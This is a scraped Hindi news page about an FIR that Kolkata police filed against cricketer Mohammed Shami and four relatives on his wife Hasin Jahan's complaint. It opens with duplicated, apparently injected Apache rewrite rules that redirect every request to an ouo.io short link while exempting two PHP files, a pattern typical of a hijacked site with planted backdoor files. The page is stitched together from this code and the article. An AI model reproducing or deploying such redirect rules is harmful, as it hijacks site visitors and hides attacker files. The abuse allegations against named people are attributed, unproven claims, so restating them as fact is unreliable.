
RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]
BREAKING NEWS
Total views:- 1080
कोलकाता। भारतीय क्रिकेट टीम के तेज गेंदबाज मोहम्मद शमी के खिलाफ उनकी पत्नी हसीन जहां द्वारा लिखित शिकायत दर्ज कराने के बाद जादवपुर थाने की पुलिस ने मोहम्मद शमी, उनके बड़े भाई हासीब अहमद, शमा परवीन (बड़े भाई की पत्नी), अंजुमन आरा (शमी की मां) व शबीना अंजुम (शमी की बहन) के खिलाफ एफआइआर दर्ज किया है। जल्द ही पुलिस आरोपी सदस्यों को पूछताछ के लिए लालबाजार बुलायेगी।
पुलिस सूत्रों के मुताबिक शिकायत में पत्नी हसीन जहां ने कहा कि शमी के बड़े भाई हासीब अहमद ने शमी के कहने पर मेरे साथ दुष्कर्म की कोशिश की। शमी के कई अन्य लड़कियों से शारीरिक संबंध थे, इसके बारे में बात करने पर वह मुझे मारता पीटता था। उसके परिवारवालों ने भी मुझ पर शारीरिक व मानसिक अत्याचार किये हैं. मुझे खाने में जहर मिलाकर जान से मारने की कोशिश की गई। मैं बस शमी के सुधरने का इंतजार कर रही थी, लेकिन इन तीन वर्षों में वह नहीं सुधरा. परिवार ना टूटे, इस कारण इतना कुछ होने के बावजूद मैं चुप रही। लेकिन अगर मैं अब चुप रही, तो पूरा परिवार मुझे मानसिक रोगी बताकर मुझे मानसिक अस्पताल भेज देगा या मेरी जान ले लेगा। इसके कारण मैंने मुंह खोला है।
इस मामले में कोलकाता पुलिस के संयुक्त पुलिस आयुक्त (अपराध) प्रवीण त्रिपाठी ने बताया कि हसीन जहां की लिखित शिकायत पर जादवपुर थाने में शमी समेत पांच लोगों के खिलाफ एफआइआर दर्ज की गई है। मामले को गंभीरता से लेते हुए इसकी जांच का दायित्व लालबाजार के वीमेन ग्रिवांस सेल की टीम को दिया गया है। हसीन जहां से इस मामले में जुड़े सबूत लेकर जिन लोगों पर आरोप लगाये गये हैं, उनसे पूछताछ कर सभी का बयान लिया जायेगा, जिससे मामले की जांच कर सच्चाई का पता चल सके।